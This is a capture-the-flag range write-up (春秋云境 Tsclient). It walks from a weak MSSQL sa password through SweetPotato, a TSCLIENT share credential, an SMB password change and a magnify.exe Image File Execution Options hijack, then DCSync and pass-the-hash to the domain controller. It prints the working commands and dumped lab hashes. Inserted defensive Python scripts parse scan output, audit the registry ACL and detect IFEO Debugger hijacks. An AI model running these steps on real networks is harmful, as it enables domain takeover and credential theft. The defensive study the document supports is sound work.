Range Writeup - 春秋云境 - Tsclient

MSSQL

A full-port scan turned up a weak MSSQL password, so I went straight to the privilege-escalation tool to execute commands.

[+] [brute] sqlserver 39.98.124.158 1433 sa 1qaz!QAZ

PowerShell one-liner to bring the host online in CS

Rotten Potato privilege escalation

None of the privesc tools bundled with CS worked, but when I uploaded SweetPotato it actually succeeded, which was odd.

Odd indeed. Upload a payload, run it once more as SYSTEM through SweetPotato, and a SYSTEM session comes in.

Check the IP

Check the users

Added a user to RDP and got the first flag.

Upload fscan and scan the /24.

[=] Load Success
[=] icmp alive
[=] dial ip4:icmp 127.0.0.1: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
[=] IP: 172.22.8.15 alive
[=] IP: 172.22.8.31 alive
[=] IP: 172.22.8.18 alive
[=] IP: 172.22.8.46 alive
[=] 执行时间:3.61037s
[=] =========================
[=] 172.22.8.15:139 open NetBiosFile
[=] 172.22.8.15:445 open smb
[=] 172.22.8.15
[>] DC01 Workstation Service
[>] XIAORANG Domain Name
[>] XIAORANG Domain Controllers
[>] DC01 Server Service
[>] XIAORANG Domain Master Browser
[=] 172.22.8.31:445 open smb
[=] 172.22.8.31:139 open NetBiosFile
[=] 172.22.8.31
[>] WIN19-CLIENT Workstation Service
[>] XIAORANG Domain Name
[>] WIN19-CLIENT Server Service
[=] 172.22.8.15:88 open unknown/tcp
[=] 172.22.8.18:80 open http
[=] [web] http://172.22.8.18:80 | [IIS Windows Server] | [len:703] | [code:200] | [finger: Microsoft IIS | ]
[=] 172.22.8.18:445 open smb
[=] 172.22.8.18:139 open NetBiosFile
[=] 172.22.8.46:80 open http
[=] [web] http://172.22.8.46:80 | [IIS Windows Server] | [len:703] | [code:200] | [finger: Microsoft IIS | ]
[=] 172.22.8.46:445 open smb
[=] 172.22.8.46:139 open NetBiosFile
[=] 172.22.8.46
[>] XIAORANG Domain Name
[>] WIN2016 Workstation Service
[>] WIN2016 Server Service
[=] 172.22.8.15:135 open rpc
[=] 172.22.8.15:53 open dns
[=] 172.22.8.15:3389 open tls/rdp
[=] 172.22.8.18:1433 open mssql
[=] 172.22.8.31:135 open rpc
[=] 172.22.8.31:3389 open tls/rdp
[+] [brute] sqlserver 172.22.8.18 1433 sa 1qaz!QAZ
[=] 172.22.8.18:135 open rpc
[=] 172.22.8.46:135 open rpc
[=] 172.22.8.18:3389 open tls/rdp
[=] 172.22.8.46:3389 open tls/rdp
[=] end......

So from the above there is a domain, and the live hosts are:

  • 172.22.8.31 domain member host

  • 172.22.8.46 domain member host

  • 172.22.8.15 DC
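Reading raw fscan output by eye gets slow once a range has more than a handful of hosts. The script below is an added example, not part of the original writeup and not fscan's own code: it parses the line formats seen above (alive hosts, open ports, NetBIOS records, brute-force hits) into a per-host inventory, marks the DC from the "Domain Controllers" NetBIOS record, and tags hosts where a credential hit was recorded so a defender can see which machines need attention first. The sample input is constructed in the same format as the scan output; the function names parse_fscan and summarize are assumptions of this example.

```python
"""Triage fscan-style output into a per-host inventory (added example, not from the
writeup or from fscan itself)."""
import re
from collections import defaultdict

# Constructed sample in the same line formats as the scan output above.
SAMPLE_SCAN = """\
[=] IP: 172.22.8.15 alive
[=] IP: 172.22.8.18 alive
[=] 172.22.8.15:445 open smb
[=] 172.22.8.15
[>] DC01 Workstation Service
[>] XIAORANG Domain Name
[>] XIAORANG Domain Controllers
[=] 172.22.8.15:88 open unknown/tcp
[=] 172.22.8.18:80 open http
[=] 172.22.8.18:1433 open mssql
[+] [brute] sqlserver 172.22.8.18 1433 sa 1qaz!QAZ
[=] end......
"""

ALIVE = re.compile(r"^\[=\] IP: (\S+) alive$")
PORT = re.compile(r"^\[=\] (\d+\.\d+\.\d+\.\d+):(\d+) open (\S+)$")
HOST_HDR = re.compile(r"^\[=\] (\d+\.\d+\.\d+\.\d+)$")   # introduces a block of [>] NetBIOS records
NETBIOS = re.compile(r"^\[>\] (\S+) (.+)$")
BRUTE = re.compile(r"^\[\+\] \[brute\] (\S+) (\S+) (\d+) (\S+) (\S+)$")


def _new_host():
    return {"ports": {}, "netbios": {}, "dc": False, "creds": []}


def parse_fscan(text):
    """Return {ip: {"ports": {port: service}, "netbios": {record: name}, "dc": bool, "creds": [...]}}."""
    hosts = defaultdict(_new_host)
    current = None                      # host whose NetBIOS records are being listed
    for line in text.splitlines():
        if m := ALIVE.match(line):
            _ = hosts[m.group(1)]       # register the host even if no port is reported
        elif m := PORT.match(line):
            ip, port, service = m.groups()
            hosts[ip]["ports"][int(port)] = service
        elif m := HOST_HDR.match(line):
            current = m.group(1)
        elif (m := NETBIOS.match(line)) and current:
            name, record = m.groups()
            hosts[current]["netbios"][record] = name
            if record == "Domain Controllers":
                hosts[current]["dc"] = True
        elif m := BRUTE.match(line):
            service, ip, port, user, password = m.groups()
            # The password is kept only so the finding can be verified; do not log it further.
            hosts[ip]["creds"].append((service, int(port), user, password))
    return dict(hosts)


def summarize(hosts):
    """One triage line per host: DCs first, then hosts with credential hits, then the rest."""
    order = sorted(hosts, key=lambda ip: (not hosts[ip]["dc"], not hosts[ip]["creds"], ip))
    lines = []
    for ip in order:
        h = hosts[ip]
        tags = ["DC"] if h["dc"] else []
        if "Domain Name" in h["netbios"]:
            tags.append("domain=" + h["netbios"]["Domain Name"])
        for service, port, user, _ in h["creds"]:
            tags.append(f"WEAK-CRED {service}:{port} user={user}")
        ports = ",".join(f"{p}/{s}" for p, s in sorted(h["ports"].items()))
        lines.append(f"{ip} [{' '.join(tags)}] {ports}")
    return lines


if __name__ == "__main__":
    for line in summarize(parse_fscan(SAMPLE_SCAN)):
        print(line)
```

Feed it the full scan text and the DC, the domain name and the MSSQL weak-password hit come out on the first two lines; the summary prints the user name of a credential hit but never the password.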

Share

Now the target is the domain hosts. Recall that earlier there was a special user, john (if the range hands you a user, it has a purpose), and the scan above shows the local host has 445 and 139 open, so presumably there is a share.

So in CS, get a session as that other user via process injection.

Once that session came up, check the share:
net use
dir \\TSCLIENT\C
type \\TSCLIENT\C\credential.txt

This gave a domain user's password. Since the scan showed 3389 open on all of them, set up a proxy and connect to a domain host over RDP.

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

It said the password had expired and had to be changed.

So the only option was to try password spraying with cme.

SMB also reported the password as expired, so the password can be changed over SMB:

proxychains python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'admin@123'

Changing the password over SMB

Then log in again.

Logging straight into the DC does not work (it would be wild if it did).

172.22.8.31

172.22.8.46 can be logged into. Since two more hosts still have to be reached laterally, first bring this one online through a forwarded (pivot) listener.

Magnifier privilege escalation

After getting the session I tried the usual privesc routes to dump hashes, but they all failed. After reading other people's writeups, it turns out the trick here is the Magnifier (magnify.exe) privilege escalation.

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
PS C:\Users\Aldrich\Desktop> get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *


PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName             : Image File Execution Options
PSDrive                 : HKLM
PSProvider              : Microsoft.PowerShell.Core\Registry
CentralAccessPolicyId   :
CentralAccessPolicyName :
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Owner                   : NT AUTHORITY\SYSTEM
Group                   : NT AUTHORITY\SYSTEM
Access                  : {System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule...}
Sddl                    : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)
AccessToString          : CREATOR OWNER Allow  FullControl
                          NT AUTHORITY\Authenticated Users Allow  SetValue, CreateSubKey, ReadKey
                          NT AUTHORITY\SYSTEM Allow  FullControl
                          BUILTIN\Administrators Allow  FullControl
                          BUILTIN\Users Allow  ReadKey
                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
AuditToString           :
AccessRightType         : System.Security.AccessControl.RegistryRights
AccessRuleType          : System.Security.AccessControl.RegistryAccessRule
AuditRuleType           : System.Security.AccessControl.RegistryAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected  : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical  : True

Focus on this part:
AccessToString          : CREATOR OWNER Allow  FullControl
NT AUTHORITY\Authenticated Users Allow SetValue, CreateSubKey, ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey

This can be thought of as something like SUID on Linux: the logged-in user has permission to modify this registry key. Using that, add an Image File Execution Options (image hijack) entry and escalate through the Magnifier: the magnify.exe that normally starts when the Magnifier button is clicked is replaced with C:\windows\system32\cmd.exe, which then runs directly as SYSTEM.
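The Sddl line in the Get-Acl output encodes exactly the weakness this paragraph describes. The script below is an added example, not from the writeup and not Windows or PowerShell code: it decodes an SDDL DACL using the registry-specific right abbreviations and reports every principal outside SYSTEM, Administrators and CREATOR OWNER that holds a write right on the key, so an administrator can audit an IFEO ACL from an exported SDDL string without touching the live registry. The page's own SDDL is the input; HARDENED_SDDL is a constructed comparison in which Authenticated Users are read-only, and audit_ifeo and the other function names are assumptions of this example.

```python
"""Decode a registry SDDL DACL and flag write access granted to unexpected principals
(added example, not from the writeup)."""
import re

# Registry-specific SDDL rights plus the standard/generic rights that matter for a key.
RIGHTS = {
    "CC": 0x00001,  # KEY_QUERY_VALUE
    "DC": 0x00002,  # KEY_SET_VALUE
    "LC": 0x00004,  # KEY_CREATE_SUB_KEY
    "SW": 0x00008,  # KEY_ENUMERATE_SUB_KEYS
    "RP": 0x00010,  # KEY_NOTIFY
    "WP": 0x00020,  # KEY_CREATE_LINK
    "SD": 0x10000,  # DELETE
    "RC": 0x20000,  # READ_CONTROL
    "WD": 0x40000,  # WRITE_DAC
    "WO": 0x80000,  # WRITE_OWNER
    "KA": 0xF003F,  # KEY_ALL_ACCESS
    "KR": 0x20019,  # KEY_READ
    "KW": 0x20006,  # KEY_WRITE
    "KX": 0x20019,  # KEY_EXECUTE
    "GA": 0x10000000, "GW": 0x40000000, "GR": 0x80000000, "GX": 0x20000000,
}
# Rights that let a principal plant or protect an IFEO entry, in report order.
WRITE_BITS = [
    (0x00002, "SetValue"), (0x00004, "CreateSubKey"), (0x40000, "WriteDAC"),
    (0x80000, "WriteOwner"), (0x10000000, "GenericAll"), (0x40000000, "GenericWrite"),
]
TRUSTEES = {
    "SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators", "CO": "CREATOR OWNER",
    "AU": "NT AUTHORITY\\Authenticated Users", "BU": "BUILTIN\\Users",
    "AC": "ALL APPLICATION PACKAGES", "WD": "Everyone", "IU": "INTERACTIVE",
}
EXPECTED_WRITERS = {"SY", "BA", "CO"}   # only these should be able to change IFEO

ACE = re.compile(r"\(([^;]*);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)")

# SDDL copied from the Get-Acl output in the writeup.
IFEO_SDDL = ("O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)"
             "(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)")
# Constructed comparison: the same DACL with Authenticated Users reduced to read access.
HARDENED_SDDL = ("O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)"
                 "(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)")


def rights_mask(field):
    """Turn an SDDL rights field (hex mask or run of two-letter codes) into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS[field[i:i + 2]]
    return mask


def parse_dacl(sddl):
    """Return [(ace_type, flags, mask, sid)] for each ACE in the D: part of the SDDL."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]   # stop at the SACL if one follows
    return [(t, f, rights_mask(r), s) for t, f, r, s in ACE.findall(dacl)]


def audit_ifeo(sddl):
    """Return [(trustee, [write rights])] for allow ACEs granting write to unexpected principals."""
    findings = []
    for ace_type, flags, mask, sid in parse_dacl(sddl):
        flag_codes = [flags[i:i + 2] for i in range(0, len(flags), 2)]
        # Denies, the expected admin principals and inherit-only ACEs do not apply to the key itself.
        if ace_type != "A" or sid in EXPECTED_WRITERS or "IO" in flag_codes:
            continue
        granted = [name for bit, name in WRITE_BITS if mask & bit]
        if granted:
            findings.append((TRUSTEES.get(sid, sid), granted))
    return findings


if __name__ == "__main__":
    print("IFEO as observed:", audit_ifeo(IFEO_SDDL))
    print("hardened:       ", audit_ifeo(HARDENED_SDDL))
```

On the live host the input is the Sddl property from the same Get-Acl call shown above. The decoded mask for CCDCLCSWRPRC is 0x2001F, i.e. ReadKey (QueryValue, EnumerateSubKeys, Notify, ReadControl) plus SetValue and CreateSubKey, which matches the AccessToString line; those two write rights are what allow a plain domain user to create the magnify.exe subkey.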

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Clicking it now gives a SYSTEM shell; run the forwarded-listener payload from there and the SYSTEM session lands in CS.
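The REG ADD above leaves a durable artifact: a Debugger value under an IFEO subkey named after an accessibility binary. The script below is an added example, not from the writeup, that scans an exported .reg text for IFEO Debugger values and rates each one; the sample .reg text, the notepad.exe and chrome.exe entries with their made-up paths, and the function names are all constructed for this example. It goes slightly beyond the page by also covering the other accessibility executables that share magnify.exe's launch path (sethc.exe, utilman.exe, osk.exe, narrator.exe, displayswitch.exe, atbroker.exe), since a monitoring rule that only watches magnify.exe misses the same technique applied to its siblings.

```python
"""Scan an exported .reg text for IFEO Debugger values (added example, not from the writeup)."""
import re

IFEO_PREFIX = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
# Accessibility executables that can be started from the logon screen or session UI;
# a Debugger value on any of them is the hijack pattern used in the writeup.
ACCESSIBILITY = {"magnify.exe", "sethc.exe", "utilman.exe", "osk.exe",
                 "narrator.exe", "displayswitch.exe", "atbroker.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Constructed .reg export: the magnify.exe entry mirrors the writeup's REG ADD; the
# notepad.exe debugger (made-up tool path) and chrome.exe key are benign filler.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe]
"Debugger"="C:\\windows\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\example-debugger.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe]
"DisableExceptionChainValidation"=dword:00000000
'''

KEY_LINE = re.compile(r"^\[(.+)\]$")
STRING_VALUE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_ifeo_debuggers(reg_text):
    """Return {image_name: debugger_command} for IFEO subkeys that set a Debugger value."""
    debuggers = {}
    image = None                          # IFEO subkey the following values belong to
    prefix = IFEO_PREFIX.lower() + "\\"
    for line in reg_text.splitlines():
        if m := KEY_LINE.match(line):
            key = m.group(1)
            image = None
            if key.lower().startswith(prefix):
                # first path component after the IFEO key, e.g. "magnify.exe"
                image = key[len(prefix):].split("\\")[0].lower()
        elif image and (m := STRING_VALUE.match(line)):
            name, value = m.groups()
            if name.lower() == "debugger":
                debuggers[image] = value.replace("\\\\", "\\")   # .reg doubles backslashes
    return debuggers


def classify(debuggers):
    """Rate each Debugger entry: HIGH for accessibility binaries or interpreter targets, else REVIEW."""
    findings = []
    for image, command in sorted(debuggers.items()):
        target = command.split(" ")[0].rsplit("\\", 1)[-1].lower()   # executable name in the command
        if image in ACCESSIBILITY:
            findings.append(("HIGH", image, command, "accessibility binary redirected"))
        elif target in INTERPRETERS:
            findings.append(("HIGH", image, command, "debugger is a command interpreter"))
        else:
            findings.append(("REVIEW", image, command, "non-standard Debugger entry"))
    return findings


if __name__ == "__main__":
    for finding in classify(parse_ifeo_debuggers(SAMPLE_REG)):
        print(*finding)
```

Any Debugger value under IFEO is worth a look, because legitimate uses are rare outside developer machines; the HIGH rating is reserved for the two signals that have no benign explanation on a server, an accessibility binary being redirected or the debugger being a command interpreter.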

PTH

Now that it is SYSTEM, dump the hashes and see whether a domain admin's hash is there.

The domain admin's hash was captured, so pass-the-hash straight to the DC.

[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 3ffd5b58b4a6328659a606c3ea6f9b63 514
1000 DC01$ edfd9bc7f992b46770192ac2061e779b 532480
500 Administrator 2c9d81bdcf3ec8b1def10328a7cc2f08 512
1103 WIN2016$ afd15b54cb6656a397256e0ee0edf5aa 16781312
1104 WIN19-CLIENT$ 673fb89e10d575157b694e94b0bfff1b 16781312
1105 Aldrich 579da618cfbfa85247acf1f800a280a4 512

proxychains python3 smbexec.py xiaorang.lab/administrator@172.22.8.15 -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08

Source: https://zjackky.github.io/post/spring-and-autumn-clouds-tsclient-z1fb7zo.html
Author: Zjacky
Published: 13 December 2023